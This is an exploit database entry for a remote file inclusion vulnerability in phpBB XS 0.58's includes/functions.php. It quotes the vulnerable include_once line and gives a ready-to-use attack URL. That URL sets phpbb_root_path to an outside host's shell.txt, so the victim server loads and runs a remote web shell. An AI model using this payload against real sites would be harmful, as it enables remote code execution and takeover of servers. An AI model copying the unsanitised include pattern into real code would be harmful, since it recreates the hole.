phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability

2006-09-12T00:00:00
ID 1337DAY-ID-818
Type zdt
Reporter AzzCoder
Modified 2006-09-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability
==================================================================



Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?




#  0day.today [2018-03-19]  #